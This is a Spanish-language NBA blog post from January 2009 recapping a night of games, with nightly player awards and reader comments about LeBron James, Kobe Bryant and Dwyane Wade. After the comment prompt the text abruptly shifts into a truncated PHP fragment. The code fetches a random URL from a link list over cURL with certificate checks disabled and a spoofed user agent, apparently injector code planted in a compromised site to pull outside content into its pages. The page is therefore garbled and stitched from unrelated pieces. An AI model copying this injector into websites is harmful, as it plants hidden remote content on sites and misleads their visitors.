La Crónica (9/1/2009)

10 de January de 2009 por TheDeerHunter

Era un día marcado en rojo en los calendarios baloncestísticos de la NBA. En el menú, el enfrentamiento que se puede convertir en un clásico del Este, el Cleveland vs Boston y junto a él la posibilidad de romper la imbatibilidad de los Cavs en casa. Desgraciadamente para los verdes, los campeones no llegaban en su mejor momento y se demostró en un partido en el que fueron absolutamente superados por la defensa local que, no olvidemos, cuentan con la baja fundamental de Ilgauskas. Lebron en modo destructor los machacó sin piedad y el único que fue capaz de plantar cara fue Garnett. Preocupante el estado de forma de Ray Allen que está últimamente como la chata. Definitivamente hacen falta refuerzos, Marbury o cualquier otro. Los veremos a bien seguro.

Orlando ya ha pasado a los Celtics gracias al barrido que le endosaron a los Hawks.  El partido de Atlanta fue inesperadamente malo y en cambio los Magic funcionaron como un reloj , con una rotación que está empezando a demostrar que es perfectamente válida. Redick, Gortat, Brian Cook… y no olvidemos a Pietrus, Bogans, Anthony Johnson o Foyle. Muchos no hubiéramos dado un duro por esta gente a principio de temporada pero mira por donde, lo están haciendo francamente bien. Veremos si son plantilla de campeones.

En otro duelo con morbo, los Pistons de Iverson le ganaron la partida a los Nuggets de Billups. Ambos equipos llegaban con bajas muy importantes y pocas conclusiones pueden sacarse pero lo cierto es que las acciones de los Pistons están subiendo como la espuma últimamente. Difícil meterlos en la terna de candidatos pero nunca se sabe.

Por la otra parte, los Lakers se llevaron el n-ésimo susto en un partidazo contra Pacers aunque esta vez el último tiro no entró. No sabemos si Kobe está al 80 o al 100 por cien pero cuando se pone en plan killer da gusto verlo. Además, en este partido, estuvo bien secundado por Gasol y Bynum. Los Pacers al completo bien pueden volver a meterse en la pelea por puesto de playoffs una vez vista la actuación de ayer de Dunleavy.

Anoche era para sentarse frente al ordenador y ver 6-7 partidos del tirón y uno que no nos podiamos perder era el Suns contra los Mavs en Phoenix. Los locales, con Shaquille superstar, se merendaron a los Mavericks. Que me aspen si los Suns no pueden ser campeones jugando así.

El resto de encuentros: Sixers ganaron a Bobcats, Raptors a Grizzlies (todavía sin Calderón), Hornets a Clippers, Rockets a Thunder (por los pelos), los Bulls a los Wizards y los Heat a los Kings.

¿Hacen las 10mejores del día?

PREMIOS

MVP: En lo que parece un adelanto del premio a final de temporada los candidatos de anoche son Dwyane Wade, Kobe Bryant y Lebron James. El de los Heat necesitó una prórroga para vencer a los Kings y se fue hasta los 41 puntos lo que le deja como máximo anotador de la noche. Kobe evitó la segunda derrota de los Lakers frente a los Pacers con un 36-7-13, aunque tuvo la ayuda de Bynum y Pau con 20 y 21 puntos respectivamente. Y en el partido de la noche Lebron destapó el tarro de las esencias con 38 puntos, 7 rebotes, 6 asistencias, 4 robos, 3 tapones y una impresionante defensa sobre Paul Pierce. Lo que hizo anoche Lebron no se puede describir con palabras. Hay que verlo.

Rookie: Noche floja para los novatos. Los mas destacados Eric Gordon con 15 puntos y 4 asistencias, Westbrook que sigue creciendo con los 15-6-6 de anoche y Mario Chalmers 13-4-4. El premio para el criticado Michael Beasley, con 23 puntos y 10 rebotes en la victoria de Miami.

La sorpresa: Varios jugadores hicieron anoche cosas poco habituales en ellos. Por ejemplo, Acie Law, en la paliza que se llevó su equipo, se dejó ver con un 16-3-3. Esperamos mucho de eé pero no es frecuente ver a Nick Young meter 28 puntos y menos aún que Rasual Butler sea el máximo anotador de los Hornets. Sus 27 puntos bien merecen nuestro premio.

La decepción: El quinteto titular de Atlanta hizo un 15 de 48 en tiros frente a Orlando, horrible. Igual o más decepcionante es ver a Paul Pierce arrollado por Lebron en ambos lados de la cancha.

Mayor esfuerzo en Vano: Muchos y muy variados aspirantes, desde el poco acostumbrado Billups con 30-4-4, pasando por otros mas habituales como Okafor, Granger o Durant, hasta llegar a nuestro premiado Vince Carter que vio como sus 23 puntos, 9 rebotes y 14 asistencias no servian para nada.

Comenta

5 comentarios a esta entrada

  1. Txusma dice:
    #1

    Yo sí prefiero olvidar a Foyle… 😀
    A ver como se recuperan los verdes de los últimos varapalos. Facil no va a ser.

      Citar

  2. llukas70 dice:
    #2

    Lebron es el mejor del mundo. Nadie puede superarle, antes tenia dudas pero ahora me doy cuenta de que si, puede llegar a ser el tan esperado nuevo Michael Jordan. Sus numeros son de sueño y ademas ya a logrado que su equipo sea el mejor de la conferencia este. Ahora deja en ridiculo a todo un campeon de la nba como Boston.
    Todo el mundo habla de Lakers o Celtics para ganar el anillo pero yo apuesto por Cleveland, este va a ser el año en que Lebron empezera la leyenda.

      Citar

  3. Jabho dice:
    #3

    Yo tengo un barrunto similar de Llukas70. Creo que Lebron está alcanzando un nivel de dominio del juego y de los partidos brutal. No sé si valoramos su final de hace 2 años, la serie contra Boston el año pasado o sus estadísticas año trás año. El siguiente paso es ganar anillos y desde lueg no hay que esperar que él falle en los momentos importantes…

    Lluskas70, todo el mundo no. yo aposté por los Cavs ya en verano: http://blog.tjnba.com/2008/10/01/cleveland-cavaliers-hasta-donde-lebron-les-lleve/

    Mis verdes pues flojitos. El ritmo tan intenso que se marcaban era imposible de mantener. Creo que no recuperaremos el liderato de la conferencia pero si que volverá la mejor versión en los PO

      Citar

  4. Viva_Dirk dice:
    #4

    No lo veo tan claro como vosotros. Estoy deacuerdo en que Lebron ha alcanzado un nivel tremendo, de hecho fuí yo el que escribió que habia que ver la exhibición de James contra los verdes porque con palabras no se podía decir, pero sinceramente creo que os ciega el presente, y me explico.

    Os olvidais por ejemplo de que Wade ganó un anillo con un equipo, en mi opinión, mas limitado que el de Lebron actualmente, lo que hizo Wade en los play-offs y las finales de aquel año está al nivel de las azañas individuales mas grandes de la historia del baloncesto.

    Subestimais tanto a Celtics como a Lakers, los actuales Lakers son mejores que los Cavs y Kobe no es peor jugador que Lebron, sus marcas individuales así lo dicen: 81 puntos en un partido, record de noches por encima de 40 puntos, siete veces en el mejor quinteto defensivo, etc. Además tiene mayor experiencia en play-offs y finales.

    En definitiva, aunque ninguno de los 3 es mi jugador favorito, Lebron no ha demostrado ser mejor que Wade o Kobe, y no digamos que Duncan.

      Citar

  5. Jabho dice:
    #5

    Yo no subestimo a ni a C´s ni a Lakers ni a Spurs. De hecho creo que entre estos 3 y Cavs está el campeón y cualquier otro sería una gran sorpresa para mi.

    Dicho esto si creo que LeBron es mejor que Wade y Kobe. Duncan ha sido para mi gusto con Shaq los jugadores mas dominantes de la última década pero por edad toca ceder el testigo.

    Hasta ahora LeBron, además de hacer unos números brutales año a año, ha ido dejando muestras de lo que es capaz. Si a todo lo que hace añade 3 o 4 anillos en los próximos años o no es capaz de ganar ningún título marcará la diferencia entre si es uno más de los muy, muy buenos o es uno de los 4 o 5 mejores de la historia… Hay que darle tiempo. Sólo digo que barrunto que estamos viendo jugar a una futura leyenda.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>